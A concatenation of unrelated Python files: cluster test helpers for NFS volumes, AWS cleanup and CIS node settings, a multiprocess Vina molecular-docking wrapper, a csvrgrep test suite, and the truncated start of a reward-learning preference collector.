def create_pv(client, nfs_ip):
pv_name = random_test_name("pv")
pv_config = {"type": "persistentVolume",
"accessModes": ["ReadWriteOnce"],
"name": pv_name,
"nfs": {"readOnly": "false",
"type": "nfsvolumesource",
"path": NFS_SERVER_MOUNT_PATH,
"server": nfs_ip
},
"capacity": {"storage": "50Gi"}
}
pv_object = client.create_persistent_volume(pv_config)
capacitydict = pv_object['capacity']
assert capacitydict['storage'] == '50Gi'
assert pv_object['type'] == 'persistentVolume'
return pv_object
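# Hedged usage sketch (assumption): provision an NFS-backed PV/PVC pair with the helpers
# above and mount the claim into a workload; mount_path and sub_path are placeholders.
def _example_nfs_backed_workload(p_client, c_client, ns, nfs_ip):
    pv, pvc = create_pv_pvc(p_client, ns, nfs_ip, c_client)
    return create_wl_with_nfs(p_client, ns.id, pvc.name,
                              random_test_name("wl-nfs"),
                              mount_path="/var/nfs", sub_path="nfs-test")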
def delete_resource_in_AWS_by_prefix(resource_prefix):
"""
:param resource_prefix: the prefix of resource name
:return: None
"""
# delete nodes of both local and custom clusters
node_filter = [{
'Name': 'tag:Name',
'Values': [resource_prefix + "-*"]
}]
nodes = AmazonWebServices().get_nodes(filters=node_filter)
if nodes is None:
print("deleting the following instances: None")
else:
print("deleting the following instances: {}"
.format([node.public_ip_address for node in nodes]))
AmazonWebServices().delete_nodes(nodes)
# delete load balancer and target groups
tg_list = []
lb_list = []
lb_names = [resource_prefix + '-nlb',
resource_prefix + '-multinode-nlb',
resource_prefix + '-k3s-nlb']
for name in lb_names:
lb_arn = AmazonWebServices().get_lb(name)
if lb_arn is not None:
lb_list.append(lb_arn)
res = AmazonWebServices().get_target_groups(lb_arn)
tg_list.extend(res)
print("deleting the following load balancers: {}".format(lb_list))
print("deleting the following target groups: {}".format(tg_list))
for lb in lb_list:
AmazonWebServices().delete_lb(lb)
for tg in tg_list:
AmazonWebServices().delete_target_group(tg)
# delete rds
db_name = resource_prefix + "-multinode-db"
print("deleting the database: {}".format(db_name))
AmazonWebServices().delete_db(db_name)
# delete the route 53 record
record_name = resource_prefix + ".qa.rancher.space."
print("deleting the route53 record: {}".format(record_name))
AmazonWebServices().delete_route_53_record(record_name)
print("deletion is done")
return None
def configure_cis_requirements(aws_nodes, profile, node_roles, client,
cluster):
i = 0
if profile == 'rke-cis-1.4':
for aws_node in aws_nodes:
aws_node.execute_command("sudo sysctl -w vm.overcommit_memory=1")
aws_node.execute_command("sudo sysctl -w kernel.panic=10")
aws_node.execute_command("sudo sysctl -w kernel.panic_on_oops=1")
if node_roles[i] == ["etcd"]:
aws_node.execute_command("sudo useradd etcd")
docker_run_cmd = \
get_custom_host_registration_cmd(client,
cluster,
node_roles[i],
aws_node)
aws_node.execute_command(docker_run_cmd)
i += 1
elif profile == 'rke-cis-1.5':
for aws_node in aws_nodes:
aws_node.execute_command("sudo sysctl -w vm.overcommit_memory=1")
aws_node.execute_command("sudo sysctl -w kernel.panic=10")
aws_node.execute_command("sudo sysctl -w vm.panic_on_oom=0")
aws_node.execute_command("sudo sysctl -w kernel.panic_on_oops=1")
aws_node.execute_command("sudo sysctl -w "
"kernel.keys.root_maxbytes=25000000")
if node_roles[i] == ["etcd"]:
aws_node.execute_command("sudo groupadd -g 52034 etcd")
aws_node.execute_command("sudo useradd -u 52034 -g 52034 etcd")
docker_run_cmd = \
get_custom_host_registration_cmd(client,
cluster,
node_roles[i],
aws_node)
aws_node.execute_command(docker_run_cmd)
i += 1
time.sleep(5)
cluster = validate_cluster_state(client, cluster)
    # wait for the workloads under the System project to become active
time.sleep(20)
if profile == 'rke-cis-1.5':
create_kubeconfig(cluster)
network_policy_file = DATA_SUBDIR + "/default-allow-all.yaml"
items = execute_kubectl_cmd("get namespaces -A")["items"]
all_ns = [item["metadata"]["name"] for item in items]
for ns in all_ns:
execute_kubectl_cmd("apply -f {0} -n {1}".
format(network_policy_file, ns))
return cluster
def get_node_details(cluster, client):
"""
    lists the nodes from the cluster (this cluster has only 1 worker node)
    and returns the first worker node
:return: client and node object
"""
create_kubeconfig(cluster)
nodes = client.list_node(clusterId=cluster.id).data
assert len(nodes) > 0
for node in nodes:
if node.worker:
break
return client, node
|
pydock.py
|
#!/usr/bin/env python
import sys
import os
import numpy as np
from multiprocessing import Manager
from multiprocessing import Process
from multiprocessing import Queue
import subprocess
import argparse
import pandas as pd
from pdbtools import ligand_tools
class DockingVina(object):
"""
python module for Vina
"""
def __init__(self, docking_params):
"""
        Construct a Docking object.
        Parameters are passed in via a dictionary:
docking_params['vina_program']
docking_params['dock_config_file']
docking_params['output_save']
docking_params['gen3d_dir']
docking_params['dock_dir']
docking_params['num_sub_proc']
docking_params['timeout_gen3d']
docking_params['timeout_dock']
docking_params['tlen']
docking_params['pout']
"""
self.vina_program = docking_params['vina_program']
self.num_sub_proc = docking_params['num_sub_proc']
self.timeout_gen3d = docking_params['timeout_gen3d']
self.timeout_dock = docking_params['timeout_dock']
self.neutralize = docking_params['neutralize']
self.pH = docking_params['pH']
self.dock_config_file = docking_params['dock_config_file']
self.output_save = docking_params['output_save']
if self.output_save:
self.tlen = docking_params['tlen']
self.pout = docking_params['pout']
self.gen3d_dir = docking_params['gen3d_dir']
if not os.path.exists(self.gen3d_dir):
try:
os.makedirs(self.gen3d_dir)
except FileExistsError as e:
print(e, flush=True)
self.dock_dir = docking_params['dock_dir']
if not os.path.exists(self.dock_dir):
try:
os.makedirs(self.dock_dir)
except FileExistsError as e:
print(e, flush=True)
self.use_my_module = docking_params['use_my_module']
if self.use_my_module:
my_module_path = docking_params['my_module_path']
my_module_dir = os.path.dirname(my_module_path)
sys.path.append(my_module_dir)
import my_module
self.my_class = my_module.my_class
self.my_class.__init__(self, docking_params)
self.rescoring = docking_params['rescoring']
self.rescoring_program = docking_params['rescoring_program']
self.rescoring_config_file = docking_params['rescoring_config_file']
def docking(self, ligand_file, docking_pdbqt_file, docking_log_file):
"""
        run the docking program using subprocess
input :
ligand_file
docking_pdbqt_file
output :
            affinity list for an input molecule
"""
run_line = '%s' % self.vina_program
run_line += ' --config %s' % self.dock_config_file
run_line += ' --ligand %s' % ligand_file
run_line += ' --out %s' % docking_pdbqt_file
if self.output_save:
run_line += ' --log %s' % (docking_log_file)
e = None
try:
result = subprocess.check_output(run_line.split(),
stderr=subprocess.STDOUT,
timeout=self.timeout_dock,
universal_newlines=True)
except Exception as e:
return [99.999], e
result_lines = result.split('\n')
check_result = False
affinity_list = list()
for result_line in result_lines:
if result_line.startswith('-----+'):
check_result = True
continue
if not check_result:
continue
if result_line.startswith('Writing output'):
break
if result_line.startswith('Refine time'):
break
lis = result_line.strip().split()
if not lis[0].isdigit():
break
# mode = int(lis[0])
affinity = float(lis[1])
affinity_list += [affinity]
if len(affinity_list) == 0:
e = 'WARNING: Could not find any conformations.'
return [99.999], e
return affinity_list, e
def docking_score_only(self, ligand_file):
"""
run docking program with score_only using subprocess
input :
ligand_file
output :
            affinity list for an input molecule
"""
run_line = '%s' % self.rescoring_program
run_line += ' --config %s' % self.rescoring_config_file
run_line += ' --ligand %s' % ligand_file
run_line += ' --score_only'
e = None
try:
result = subprocess.check_output(run_line.split(),
stderr=subprocess.STDOUT,
timeout=self.timeout_dock,
universal_newlines=True)
except Exception as e:
return [99.999], e
result_lines = result.split('\n')
# weight_list = list()
# check_weight = False
affinity_list = list()
for result_line in result_lines:
# if result_line.startswith('Weights'):
# check_weight = True
# continue
# if check_weight:
# lis = result_line.strip().split()
# if len(lis) <2:
# check_weight = False
# continue
# weight_list += [[float(lis[0]), lis[1]]]
# continue
if result_line.startswith('Affinity:'):
lis = result_line.strip().split()
affinity = float(lis[1])
affinity_list += [affinity]
if len(affinity_list) == 0:
return [99.999], e
return affinity_list, e
def creator(self, q, data, num_sub_proc):
"""
put data to queue
input: queue
data = [(idx1, molid1, smi1), (idx2, molid2, smi2), ...]
num_sub_proc (for end signal)
"""
for d in data:
idx = d[0]
q.put((idx, d[1]))
for i in range(0, num_sub_proc):
q.put('DONE')
def simulation_process(self, idx, mol_id, smi, pid):
result_dict = dict()
if self.neutralize or (self.pH is not None):
smi_p = ligand_tools.ligand_preparation(smi, self.neutralize,
self.pH)
else:
smi_p = smi
if not self.output_save:
ligand_pdb_file = '%s/ligand_%d.pdb' % (self.gen3d_dir, pid)
ligand_pdbqt_file = '%s/ligand_%s.pdbqt' % (self.gen3d_dir, pid)
docking_pdbqt_file = '%s/dock_%d.pdbqt' % (
self.dock_dir, pid)
docking_log_file = '%s/dock_%d.log' % (self.dock_dir, pid)
docking_pdb_file = '%s/dock_%s.pdb' % (self.dock_dir, pid)
out_dock_dir1 = None
else:
mol_id2 = mol_id[0:self.tlen]
out_gen3d_dir1 = self.gen3d_dir + "/" + mol_id2
if not os.path.exists(out_gen3d_dir1):
try:
os.makedirs(out_gen3d_dir1)
except FileExistsError as e:
print(e, flush=True)
ligand_pdb_file = '%s/ligand_%s.pdb' % (out_gen3d_dir1, mol_id)
ligand_pdbqt_file = '%s/ligand_%s.pdbqt' % (out_gen3d_dir1, mol_id)
out_dock_dir1 = self.dock_dir + "/" + mol_id2
if not os.path.exists(out_dock_dir1):
try:
os.makedirs(out_dock_dir1)
except FileExistsError as e:
print(e, flush=True)
docking_pdbqt_file = '%s/dock_%s.pdbqt' % (out_dock_dir1, mol_id)
docking_pdb_file = '%s/dock_%s.pdb' % (out_dock_dir1, mol_id)
docking_log_file = '%s/dock_%s.log' % (out_dock_dir1, mol_id)
e = ligand_tools.gen_3d(smi_p, ligand_pdb_file,
timeout=self.timeout_gen3d)
if e is not None:
e2 = ligand_tools.gen_3d(smi_p, ligand_pdb_file,
timeout=self.timeout_gen3d)
if e2 is not None:
print(e2, 'gen_3d', idx, mol_id, smi_p, flush=True)
docking_score = np.array([99.999], dtype=np.float32)
result_dict['docking'] = docking_score
return result_dict
e = ligand_tools.pdb_to_pdbqt(ligand_pdb_file, ligand_pdbqt_file)
if e is not None:
print(e, 'pdb_to_pdbqt', idx, mol_id, smi_p, flush=True)
docking_score = np.array([99.999], dtype=np.float32)
result_dict['docking'] = docking_score
return result_dict
docking_score, e = self.docking(ligand_pdbqt_file, docking_pdbqt_file,
docking_log_file)
docking_score = np.array(docking_score, dtype=np.float32)
if e is not None:
docking_score = [99.999]
result_dict['docking'] = docking_score
print(e, 'docking', idx, mol_id, smi_p, flush=True)
return result_dict
result_dict['docking'] = docking_score
if self.output_save or self.rescoring or self.use_my_module:
ligand_tools.pdbqt_to_pdb_ref(
docking_pdbqt_file, docking_pdb_file, ligand_pdb_file)
if self.rescoring:
docking_rescore, e = self.docking_score_only(docking_pdb_file)
docking_rescore = np.array(docking_rescore, dtype=np.float32)
if e is not None:
docking_rescore = np.array([99.999], dtype=np.float32)
print(e, 're-scoring', idx, mol_id, smi_p, flush=True)
result_dict['docking_re'] = docking_rescore
if self.use_my_module:
self.my_class.simulation_process(self, idx, mol_id, smi, smi_p,
pid, out_dock_dir1,
docking_pdb_file, result_dict)
return result_dict
def worker(self, q, return_dict):
"""
generate subprocess for docking
input
q (queue)
return_dict
"""
pid = os.getpid()
while True:
qqq = q.get()
if qqq == 'DONE':
# print('proc =', os.getpid())
break
(idx, d) = qqq
mol_id = d[0]
smi = d[1]
# print screening processing in every pout step
if self.pout != 0:
if idx % self.pout == self.pout-1:
print("processing: ", idx+1, flush=True)
result_dict = self.simulation_process(idx, mol_id, smi, pid)
return_dict[idx] = result_dict
def predict(self, smiles_list):
"""
input SMILES list
output result_dict
        result_dict includes the affinity list (and other scores)
        corresponding to the SMILES list;
        if docking fails, the docking score is [99.999]
"""
data = list(enumerate(smiles_list))
num_data = len(data)
num_sub_proc = min(self.num_sub_proc, num_data)
q1 = Queue()
manager = Manager()
return_dict = manager.dict()
proc_master = Process(target=self.creator,
args=(q1, data, num_sub_proc))
proc_master.start()
        # create worker processes
procs = []
for sub_id in range(0, num_sub_proc):
proc = Process(target=self.worker, args=(q1, return_dict))
procs.append(proc)
proc.start()
q1.close()
q1.join_thread()
proc_master.join()
for proc in procs:
proc.join()
keys = sorted(return_dict.keys())
result_dict = dict()
docking_score_list = list()
if self.rescoring:
docking_re_list = list()
for key in range(num_data):
if key in keys:
result_dict0 = return_dict[key]
if 'docking' in result_dict0:
docking_score = result_dict0['docking']
else:
docking_score = np.array([99.999], dtype=np.float32)
if self.rescoring:
if 'docking_re' in result_dict0:
docking_re = result_dict0['docking_re']
else:
docking_re = np.array([99.999], dtype=np.float32)
else:
docking_score = np.array([99.999], dtype=np.float32)
if self.rescoring:
docking_re = np.array([99.999], dtype=np.float32)
docking_score_list += [docking_score]
if self.rescoring:
docking_re_list += [docking_re]
result_dict['docking'] = docking_score_list
if self.rescoring:
result_dict['docking_re'] = docking_re_list
if self.use_my_module:
self.my_class.predict(self, smiles_list, result_dict, return_dict)
return result_dict
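# Hedged usage sketch (assumption): the minimal parameter dictionary below mirrors the
# keys read in DockingVina.__init__; the program name, config path and tmp directories
# are placeholders, not values required by the class.
def _example_docking_run(smiles_list, config_file='dock_config.txt'):
    docking_params = {
        'vina_program': 'qvina02',
        'dock_config_file': config_file,
        'output_save': False,
        'gen3d_dir': 'tmp',
        'dock_dir': 'tmp',
        'num_sub_proc': 4,
        'timeout_gen3d': 1,
        'timeout_dock': 120,
        'tlen': 7,
        'pout': 0,
        'neutralize': False,
        'pH': None,
        'use_my_module': False,
        'my_module_path': None,
        'rescoring': False,
        'rescoring_program': 'smina',
        'rescoring_config_file': None,
    }
    docking_vina = DockingVina(docking_params)
    # smiles_list entries are (mol_id, smiles) pairs, matching main() below
    return docking_vina.predict(smiles_list)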
class LoadFromConfig(argparse.Action):
def __call__(self, parser, namespace, values, option_string=None):
with values as f:
parser.parse_args(f.read().split(), namespace)
class ExtendAction(argparse.Action):
def __call__(self, parser, namespace, values, option_string=None):
items = getattr(namespace, self.dest) or []
items.extend(values)
setattr(namespace, self.dest, items)
def parser_arg(parser):
# vina parameter
parser.register('action', 'extend', ExtendAction)
parser.add_argument('--arg_file', type=open, required=False, default=None,
                        action=LoadFromConfig, help='argument file')
parser.add_argument('--dock_config', type=str, required=False,
default=None, help='docking config file ')
parser.add_argument('-v', '--vina_program', type=str, required=False,
default='qvina02',
help='select vina, qvina02, or smina')
parser.add_argument('--my_module', type=str, required=False,
default=None,
help='set user python module path (for pifinder)')
parser.add_argument('--neutralize', action='store_true',
required=False, help='neutralize smiles ')
parser.add_argument('--pH', type=float, default=None,
                        required=False,
                        help='protonation pH for ligand preparation, e.g. 7.4')
parser.add_argument('--output_save', action='store_true', required=False,
                        help='keep per-molecule output files; by default '
                             'the output pdbqt is a temp file')
parser.add_argument('--gen3d_dir', type=str, required=False, default='tmp',
help='3d initial conformation directory')
parser.add_argument('--dock_dir', type=str, required=False,
default='tmp', help='binding conformation directory')
parser.add_argument('--num_sub_proc', type=int, required=False,
default=10, help=' --num_sub_proc 10')
parser.add_argument('--timeout_gen3d', type=int, required=False,
default=1, help=' --timeout_gen3d 1')
parser.add_argument('--timeout_dock', type=int, required=False,
default=120, help=' --timeout_dock 120')
    parser.add_argument('--tlen', type=int, default=7, required=False,
                        help='length of sub directory name, default: 7')
    parser.add_argument('--pout', type=int, default=0, required=False,
                        help='print progress every pout molecules '
                             '(0 disables), default: 0')
parser.add_argument('--rescoring_program', type=str, required=False,
default='smina', help='smina path')
parser.add_argument('--rescoring_config', type=str, required=False,
default=None, help='docking config file for rescoring')
return
def arg_to_params(parser):
use_my_module = False
for i, m in enumerate(sys.argv):
if m == '--my_module':
my_module_path = sys.argv[i+1]
use_my_module = True
my_module_dir = os.path.dirname(my_module_path)
sys.path.append(my_module_dir)
import my_module
my_module.parser_arg(parser)
args = parser.parse_args()
vina_program = args.vina_program
num_sub_proc = args.num_sub_proc
timeout_gen3d = args.timeout_gen3d
timeout_dock = args.timeout_dock
output_save = args.output_save
gen3d_dir = args.gen3d_dir
dock_dir = args.dock_dir
dock_config_file = args.dock_config
tlen = args.tlen
pout = args.pout
neutralize = args.neutralize
pH = args.pH
rescoring = False
rescoring_config_file = args.rescoring_config
rescoring_program = args.rescoring_program
if rescoring_config_file is not None:
rescoring = True
docking_params = dict()
docking_params['vina_program'] = vina_program
docking_params['gen3d_dir'] = gen3d_dir
docking_params['dock_dir'] = dock_dir
docking_params['num_sub_proc'] = num_sub_proc
docking_params['timeout_gen3d'] = timeout_gen3d
docking_params['timeout_dock'] = timeout_dock
docking_params['output_save'] = output_save
docking_params['tlen'] = tlen
docking_params['pout'] = pout
docking_params['neutralize'] = neutralize
docking_params['pH'] = pH
docking_params['dock_config_file'] = dock_config_file
docking_params['rescoring'] = rescoring
docking_params['rescoring_program'] = rescoring_program
docking_params['rescoring_config_file'] = rescoring_config_file
my_module_path = args.my_module
docking_params['use_my_module'] = use_my_module
docking_params['my_module_path'] = my_module_path
if use_my_module:
docking_params = my_module.arg_to_params(parser, docking_params)
return args, docking_params
def main():
parser = argparse.ArgumentParser(description='docking with multi process')
parser.add_argument('-l', '--ligand_list_file', type=str, required=False,
default='smiles.txt',
help=' --ligand_list_file smiles.txt')
parser.add_argument('-o', '--output_file', type=str, required=False,
default='docking.txt',
help=' --output_file docking.txt')
parser_arg(parser)
args, docking_params = arg_to_params(parser)
ligand_list_file = args.ligand_list_file
output_file = args.output_file
if len(sys.argv) < 2:
parser.print_usage()
sys.exit()
if args.dock_config is None:
parser.print_usage()
print('dock_config is missing')
sys.exit()
ligand_file_format = ligand_list_file.strip().split('.')[-1]
if ligand_file_format == 'txt':
        field_separator = r'\s+'
elif ligand_file_format == 'csv':
field_separator = ','
elif ligand_file_format == 'tsv':
field_separator = '\t'
else:
field_separator = None
if ligand_file_format == 'pkl':
df = pd.read_pickle(ligand_list_file)
else:
df = pd.read_csv(ligand_list_file, sep=field_separator)
# num_data = df.shape[0]
fkey = df.keys()[0]
if fkey.startswith('#'):
df.rename(columns={fkey: fkey[1:]}, inplace=True)
smiles_list = df[['MOL_ID', 'SMILES']].values.tolist()
# smiles_list = smiles_list[0:10]
docking_vina = DockingVina(docking_params)
result_dict = docking_vina.predict(smiles_list)
docking_score_list = result_dict['docking']
docking_min = [x[0] for x in docking_score_list]
df['Docking1'] = docking_min
df['Docking'] = docking_score_list
if docking_params['rescoring']:
rescoring = result_dict['docking_re']
df['Docking_re'] = rescoring
use_my_module = docking_params['use_my_module']
my_module_path = docking_params['my_module_path']
if use_my_module:
my_module_dir = os.path.dirname(my_module_path)
sys.path.append(my_module_dir)
import my_module
my_module.my_score_to_df(df, docking_params, result_dict)
sep = field_separator
    if sep == r'\s+':
sep = ' '
if output_file.strip().split('.')[-1] == 'pkl':
df.to_pickle(output_file)
else:
df.to_csv(output_file, sep=sep, float_format='%.3f', index=False)
if __name__ == "__main__":
main()
|
_do_not_test_csvrgrep.py
|
"""
csvrgrep is experimental
"""
import contextlib
from io import StringIO
import sys
from subprocess import PIPE, Popen
from tests.mk import (
CmkTestCase,
ColumnsTests,
EmptyFileTests,
NamesTests,
patch,
skiptest,
)
from csvmedkit.xutils.csvrgrep import CSVRgrep, launch_new_instance
from csvmedkit.exceptions import *
# CLI_PATH is used (rather than a `csvrgrep` console command) since csvrgrep is not a registered entry point
CLI_PATH = "./csvmedkit/xutils/csvrgrep.py"
class TestCSVRgrep(CmkTestCase, EmptyFileTests, ColumnsTests, NamesTests):
Utility = CSVRgrep
default_args = [
r"\d",
"examples/dummy.csv",
]
columns_args = [
r"\d+",
]
def test_launch_new_instance(self):
with patch.object(
sys,
"argv",
[self.Utility.__name__.lower()] + self.default_args
# + ["examples/dummy.csv"],
):
launch_new_instance()
def test_skip_lines(self):
self.assertRows(
[
"--skip-lines",
"3",
"-c",
"a,b",
"1",
"examples/test_skip_lines.csv",
],
[
["a", "b", "c"],
["1", "2", "3"],
],
)
def test_basic(self):
"""
a,b,c
1,2,3
2,3,42
3,4,1
22,99,222
"""
self.assertRows(
[r"\d{2}", "examples/dummy5.csv"],
[["a", "b", "c"], ["2", "3", "42"], ["22", "99", "222"]],
)
def test_basic_column_arg(self):
"""
a,b,c
1,2,3
2,3,42
3,4,1
22,99,222
"""
self.assertRows(
[
r"3|22",
"examples/dummy5.csv",
"-c",
"b,c",
],
[["a", "b", "c"], ["1", "2", "3"], ["2", "3", "42"], ["22", "99", "222"]],
)
def test_two_patterns(self):
"""
a,b,c
1,2,3
2,3,42
3,4,1
22,99,222
"""
self.assertRows(
[
"-c",
"b,c",
"3|22",
"-E",
r"^\d$",
"examples/dummy5.csv",
],
[["a", "b", "c"], ["1", "2", "3"], ["2", "3", "42"]],
)
def test_multi_patterns_explicit_col_arg(self):
"""
1,2,3
2,3,42
3,4,1
22,99,222
"""
self.assertLines(
[
"-c",
"b,c",
"3|22",
"-E",
r"^\d$",
"c",
"examples/dummy5.csv",
],
["a,b,c", "1,2,3"],
)
######################################################################
# test match modes
######################################################################
def test_basic_literal_match(self):
self.assertRows(
["-m", r"\d{2}", "examples/dummy5.csv"],
[
["a", "b", "c"],
],
)
self.assertRows(
["-m", "-c", "c", "22", "examples/dummy5.csv"],
[["a", "b", "c"], ["22", "99", "222"]],
)
def test_all_match(self):
"""TODO: can't mix and match positional and optional args?"""
self.assertLines(
["-a", "-c", "a,c", r"\d{2,}", "examples/dummy5.csv"],
[
"a,b,c",
"22,99,222",
],
)
######################################################################
# multi expressions
######################################################################
def test_multi_expression_basic(self):
self.assertLines(
["2", "-E", r"1|3", "examples/dummy5.csv"],
[
"a,b,c",
"1,2,3",
"2,3,42",
],
)
def test_multi_expression_variable_expr_args(self):
self.assertLines(
["2", "-m", "-E", r"3", "b,c", "-E", "2", "examples/dummy5.csv"],
[
"a,b,c",
"1,2,3",
"2,3,42",
],
)
def test_expr_col_arg_overrides_main_columns_flag(self):
"""
if the expression has a column str other than '', then its list of column_ids to grep
takes precedence over -c/--columns
"""
self.assertLines(
["-c", "a,c", "2", "-E", r"\d{2,}", "b", "examples/dummy5.csv"],
[
"a,b,c",
"22,99,222",
],
)
def test_expr_col_arg_defaults_to_main_columns_flag(self):
"""
if the expression has a blank column str, then it uses whatever -c/--columns is set to
(and if -c is unset, then all columns are grepped)
1,2,3
2,3,42
3,4,1
22,99,222
"""
self.assertLines(
[
"-c",
"c,a",
"2",
"-E",
r"\d{2,}",
"a,b,c",
"-E",
"4",
"examples/dummy5.csv",
],
[
"a,b,c",
"2,3,42",
],
)
self.assertLines(
["-c", "a,b", "2", "-E", "3", "examples/dummy5.csv"],
[
"a,b,c",
"2,3,42",
],
)
def test_multi_expressions_are_ANDed_not_ORed(self):
self.assertLines(
[
".+",
"examples/hamlet.csv",
"--expr",
r"^[HL]",
"speaker",
"--expr",
r"[^1]",
"act",
"--expr",
r"\w{6,}",
],
[
"act,scene,speaker,lines",
"4,7,Laertes,Know you the hand?",
],
)
######################################
# discerning input_file/stdin argument
######################################
def test_when_single_pattern_and_no_input_file(self):
r"""
cat data.txt | csvrgrep '4'
"""
# p1 = Popen(["cat", "examples/dummy5.csv"], stdout=PIPE)
# p2 = Popen(
# [
# CLI_PATH,
# "4",
# ],
# stdin=p1.stdout,
# stdout=PIPE,
# )
# p1.stdout.close()
# p1.wait()
# txt = p2.communicate()[0].decode("utf-8")
# p2.wait()
# lines = txt.splitlines()
self.assertCmdLines(
"cat examples/dummy5.csv | csvrgrep '4'",
[
"a,b,c",
"2,3,42",
"3,4,1",
],
)
def test_when_last_expr_has_just_one_arg_and_no_input_file(self):
r"""
cat data.txt | csvrgrep '1' -E '4'
"""
# p1 = Popen(["cat", "examples/dummy5.csv"], stdout=PIPE)
# p2 = Popen([CLI_PATH, "1", "-E", "4"], stdin=p1.stdout, stdout=PIPE)
# p1.stdout.close()
# p1.wait()
# txt = p2.communicate()[0].decode("utf-8")
# p2.wait()
# lines = txt.splitlines()
self.assertCmdLines(
"""cat examples/dummy5.csv | csvrgrep '1' -E '4'""",
[
"a,b,c",
"3,4,1",
],
)
######################################
# special names test
######################################
@skiptest("csvrgrep is not a registered entry point")
def test_names_mode_with_stdin(self):
# p1 = Popen(["cat", "examples/dummy.csv"], stdout=PIPE)
# p2 = Popen([CLI_PATH, "-n"], stdin=p1.stdout, stdout=PIPE)
# p1.stdout.close()
# p1.wait()
# txt = p2.communicate()[0].decode("utf-8")
# p2.wait()
# lines = [t.strip() for t in txt.splitlines()]
self.assertCmdLines(
"""cat examples/dummy.csv | csvrgrep -n""",
[
"1: a",
"2: b",
"3: c",
],
)
######################################
# errors
######################################
def test_error_when_no_pattern_and_no_input_file(self):
ioerr = StringIO()
with contextlib.redirect_stderr(ioerr):
with self.assertRaises(SystemExit) as e:
u = self.get_output([])
self.assertEqual(e.exception.code, 2)
self.assertIn("Must provide a [PATTERN] argument", ioerr.getvalue())
def test_error_when_no_pattern_but_additional_expressions(self):
""""todo, maybe redundant"""
ioerr = StringIO()
with contextlib.redirect_stderr(ioerr):
with self.assertRaises(SystemExit) as e:
u = self.get_output(["-E", "1", "examples/dummy.csv"])
self.assertEqual(e.exception.code, 2)
self.assertIn("Must provide a [PATTERN] argument", ioerr.getvalue())
def test_error_when_expression_has_0_args(self):
ioerr = StringIO()
with contextlib.redirect_stderr(ioerr):
with self.assertRaises(SystemExit) as e:
u = self.get_output(["-E", "-m", "PATTERN", "examples/dummy.csv"])
self.assertEqual(e.exception.code, 2)
self.assertIn("-E/--expr takes 1 or 2 arguments, not 0:", ioerr.getvalue())
def test_error_when_expression_has_more_than_2_args(self):
ioerr = StringIO()
with contextlib.redirect_stderr(ioerr):
with self.assertRaises(SystemExit) as e:
u = self.get_output(
[
"PATTERN",
"examples/dummy.csv",
"-E",
"a",
"b",
"c",
]
)
self.assertEqual(e.exception.code, 2)
self.assertIn("-E/--expr takes 1 or 2 arguments, not 3:", ioerr.getvalue())
def test_no_error_when_expression_has_1_args_and_piped_input(self):
p1 = Popen(
[
"cat",
"examples/dummy.csv",
],
stdout=PIPE,
)
p2 = Popen(
[
CLI_PATH,
"2|1",
"-E",
"1|2",
],
stdin=p1.stdout,
stdout=PIPE,
)
p1.stdout.close()
p1.wait()
txt = p2.communicate()[0].decode("utf-8")
p2.wait()
self.assertEqual(txt.splitlines(), ["a,b,c", "1,2,3"])
@skiptest("because I dont know how to deal with stdin.isatty holdup")
def test_error_when_final_expression_eats_up_input_path(self):
ioerr = StringIO()
old_stdin = sys.stdin
with contextlib.redirect_stderr(ioerr):
# with self.assertRaises(SystemExit) as e:
args = ["-E", "1", "-E", "2", "-E", "examples/dummy.csv"]
# p = Process(target=self.get_output, args=(args,))
# p.start()
sys.stdin = StringIO("a,b,c\n1,2,3\n")
# p.join()
self.assertIn("WARNING", ioerr.getvalue())
# self.assertEqual(e.exception.code, 2)
# clean up stdin
        sys.stdin = old_stdin
|
pcollector.py
|
# -*- coding:utf8 -*-
# File : pcollector.py
# Author : Jiayuan Mao
# Email : maojiayuan@gmail.com
# Date : 01/07/2017
#
# This file is part of TensorArtist.
import os
import collections
import itertools
import os.path as osp
import threading
import uuid
import imageio
import numpy as np
import sortedcollections
from tornado import ioloop, template
from tornado.web import Application, StaticFileHandler
from tartist.core import get_env, get_logger
from tartist.core import io
from tartist.core.utils.network import get_local_addr
from .rpredictor import TrainingData
TrajectoryPair = collections.namedtuple('TrajectoryPair', ['t1_state', 't1_observation', 't1_action',
't2_state', 't2_observation', 't2_action'])
_TrajectoryPairWrapper = collections.namedtuple('_TrajectoryPairWrapper', ['priority', 'count', 'pair'])
logger = get_logger(__file__)
def _compose_dir(uuid):
dirname = osp.join(get_env('dir.root'), 'trajectories', uuid)
return dirname
def _save_gif(traj, filename):
traj = np.asarray(traj, dtype='uint8')
return imageio.mimwrite(filename, traj, duration=0.1)
class PreferenceCollector(object):
"""Preference collector is the interface for prefcol's front end."""
def __init__(self, rpredictor, web_configs, video_length=100, window_length=300, pool_size=100):
"""
Initialize the preference collector.
:param rpredictor: the corresponding reward predictor.
:param web_configs: web server configs.
:param video_length: video length.
        :param window_length: window length for video sampling. The video for labeling is sampled by choosing
            the `video_length` consecutive frames with the largest summed variance within every `window_length` frames.
:param pool_size: cache pool size for labeling.
"""
self._rpredictor = rpredictor
self._pool = TrajectoryPairPool(maxlen=pool_size)
self._webserver = WebServer(self, configs=web_configs)
self._webserver_thread = None
self._video_length = video_length
self._window_length = window_length
assert self._video_length <= self._window_length
# `data` holds the working set of each worker (wid => list of observations)
self._data_buffer = collections.defaultdict(lambda: collections.deque(maxlen=window_length))
# pair buffer is a buffer with size at most 2, used for generating the pair
self._pair_buffer = []
self._pair_mutex = threading.Lock()
@property
def pool(self):
return self._pool
@property
def rpredictor(self):
return self._rpredictor
def initialize(self):
# First: try to restore the stored preference.
self.__restore_preferences()
# Start the webserver thread.
self._webserver_thread = threading.Thread(target=self._webserver.mainloop, daemon=True)
self._webserver_thread.start()
def post_state(self, identifier, state, observation, action, variance):
# Do NOT use lock: each worker (identified by `identifier`) is one thread.
data = self._data_buffer[identifier]
data.append((state, observation, action, variance))
if len(data) == data.maxlen:
self._try_post_video(data)
def post_preference(self, uid, pref):
dirname = _compose_dir(uid)
pair = io.load(osp.join(dirname, 'pair.pkl'))
io.dump(osp.join(dirname, 'pref.txt'), str(pref))
logger.info('Post preference uid={}, pref={}.'.format(uid, pref))
data = TrainingData(pair.t1_state, pair.t1_action, pair.t2_state, pair.t2_action, pref)
# Lock acquired inside this function call.
self._rpredictor.add_training_data(data)
def _try_post_video(self, data):
# Find the subsequence with largest variance.
current_sum = 0
for i in range(self._video_length):
current_sum += data[i][-1]
max_sum, max_idx = current_sum, 0
for i in range(self._video_length, self._window_length):
current_sum = current_sum - data[i-self._video_length][-1] + data[i][-1]
if current_sum > max_sum:
                max_sum, max_idx = current_sum, i - self._video_length + 1  # window ending at i starts at i - video_length + 1
